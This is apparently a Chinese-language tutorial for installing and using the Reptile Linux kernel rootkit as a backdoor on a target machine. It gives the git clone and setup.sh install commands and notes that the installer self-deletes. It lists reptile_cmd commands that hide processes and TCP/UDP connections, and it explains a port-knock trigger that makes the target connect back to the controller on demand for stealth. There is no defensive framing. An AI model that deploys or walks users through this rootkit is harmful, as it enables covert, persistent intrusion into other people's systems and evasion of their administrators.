项目地址
https://github.com/f0rb1dd3n/Reptile
1.下载
客户端和服务端都用在一起用的
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
2.目标机器安装后门
全自动化安装,安装后也会全自动删除
要注意需要交互式shell
./setup.sh install
看看rootkit效果
没有进程,没有连接
这个后门还可以用命令隐藏任意其他你想要隐藏的东西
隐藏进程: /reptile/reptile_cmd hide
显示进程: /reptile/reptile_cmd show
隐藏tcp或者udp连接
隐藏: /reptile/reptile_cmd udphide
显示: /reptile/reptile_cmd udpshow
目标机器上种这个后门还是很简单的
就是只能对lkm机器使用
3.控制端安装使用
先生成控制端程序
使用控制端,help可以看命令
cd bin
./client
这个后门的运作逻辑是
用任意机器(一般都是控制机)的特定端口(配置目标机器的时候666那个srcport参数)给目标 任意端口发送一段数据。
然后目标机器接受到这个数据,再按照配置的里面回连
所以这样的好处就是,按需连接,不需要连接的时候没有动作,更加隐蔽。
连接后门之前要用set命令配置
